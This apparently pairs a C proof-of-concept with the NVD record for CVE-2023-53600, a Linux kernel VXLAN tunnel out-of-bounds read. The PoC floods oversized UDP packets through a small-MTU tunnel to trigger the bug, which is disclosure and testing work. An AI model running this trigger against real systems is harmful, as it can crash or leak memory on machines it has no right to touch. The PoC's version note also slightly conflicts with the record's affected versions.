CVE-2023-53600

/* CVE-2023-53600 - Linux Kernel Tunnel PMTU OOB Read PoC * This PoC demonstrates triggering the KASAN out-of-bounds read * by sending large packets through a VXLAN tunnel that exceed MTU. * * Requirements: * - Linux kernel < 6.5-rc4 (vulnerable version) * - VXLAN interface configured * - KASAN enabled kernel (for detection) * * Setup VXLAN tunnel: * ip link add vxlan100 type vxlan id 100 dev eth0 remote <remote_ip> * ip addr add 192.168.100.1/24 dev vxlan100 * ip link set vxlan100 up * * Set small MTU to trigger PMTU error: * ip link set vxlan100 mtu 100 */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <sys/socket.h> #include <netinet/in.h> #include <arpa/inet.h> #define BUFFER_SIZE 65535 #define VXLAN_MTU 100 int main(int argc, char *argv[]) { int sockfd; struct sockaddr_in dest_addr; char *buffer; int ret; /* Create UDP socket for sending data through tunnel */ sockfd = socket(AF_INET, SOCK_DGRAM, 0); if (sockfd < 0) { perror("socket creation failed"); return 1; } /* Allocate large buffer to exceed VXLAN MTU */ buffer = malloc(BUFFER_SIZE); if (!buffer) { perror("malloc failed"); close(sockfd); return 1; } memset(buffer, 'A', BUFFER_SIZE); /* Configure destination address through VXLAN tunnel */ memset(&dest_addr, 0, sizeof(dest_addr)); dest_addr.sin_family = AF_INET; dest_addr.sin_port = htons(5201); /* iperf3 port */ inet_pton(AF_INET, "192.168.100.2", &dest_addr.sin_addr); /* Send large packets to trigger PMTU error generation */ /* This will cause the kernel to attempt building an ICMP * PMTU error for the nonlinear skb, triggering the OOB read */ for (int i = 0; i < 100; i++) { ret = sendto(sockfd, buffer, BUFFER_SIZE, 0, (struct sockaddr *)&dest_addr, sizeof(dest_addr)); if (ret < 0) { perror("sendto failed"); break; } } printf("PoC execution completed. Check dmesg for KASAN report.\n"); free(buffer); close(sockfd); return 0; }

{"cve": {"id": "CVE-2023-53600", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-04T16:15:56.603", "lastModified": "2026-03-23T18:21:42.483", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ntunnels: fix kasan splat when generating ipv4 pmtu error\n\nIf we try to emit an icmp error in response to a nonliner skb, we get\n\nBUG: KASAN: slab-out-of-bounds in ip_compute_csum+0x134/0x220\nRead of size 4 at addr ffff88811c50db00 by task iperf3/1691\nCPU: 2 PID: 1691 Comm: iperf3 Not tainted 6.5.0-rc3+ #309\n[..]\n kasan_report+0x105/0x140\n ip_compute_csum+0x134/0x220\n iptunnel_pmtud_build_icmp+0x554/0x1020\n skb_tunnel_check_pmtu+0x513/0xb80\n vxlan_xmit_one+0x139e/0x2ef0\n vxlan_xmit+0x1867/0x2760\n dev_hard_start_xmit+0x1ee/0x4f0\n br_dev_queue_push_xmit+0x4d1/0x660\n [..]\n\nip_compute_csum() cannot deal with nonlinear skbs, so avoid it.\nAfter this change, splat is gone and iperf3 is no longer stuck."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-125"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.9", "versionEndExcluding": "5.10.191", "matchCriteriaId": "3E5F49AE-0B0F-4CE5-99C9-AF41E6414918"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.11", "versionEndExcluding": "5.15.127", "matchCriteriaId": "945AF8F7-5328-4A14-B072-A5740192C9E1"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.16", "versionEndExcluding": "6.1.46", "matchCriteriaId": "D8B8CC90-9492-465C-81D4-10DA3B712286"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2", "versionEndExcluding": "6.4.11", "matchCriteriaId": "C36FD9E6-B6D7-4887-8F08-C1F64E139D5C"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.5:rc1:*:*:*:*:*:*", "matchCriteriaId": "0B3E6E4D-E24E-4630-B00C-8C9901C597B0"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.5:rc2:*:*:*:*:*:*", "matchCriteriaId": "E4A01A71-0F09-4DB2-A02F-7EFFBE27C98D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.5:rc3:*:*:*:*:*:*", "matchCriteriaId": "F5608371-157A-4318-8A2E-4104C3467EA1"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.5:rc4:*:*:*:*:*:*", "matchCriteriaId": "2226A776-DF8C-49E0-A030-0A7853BB018A"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.5:rc5:*:*:*:*:*:*", "matchCriteriaId": "6F15C659-DF06-455A-9765-0E6DE920F29A"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/5850c391fd7e25662334cb3cbf29a62bcbff1084", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/6a7ac3d20593865209dceb554d8b3f094c6bd940", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/da5f42a6e7485fbb7a6dbd6a2b3045e19e4df5cc", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/e95808121953410db8c59f0abfde70ac0d34222c", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/fe6a9f7516735be9fdabab00e47ef7a3403a174d", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}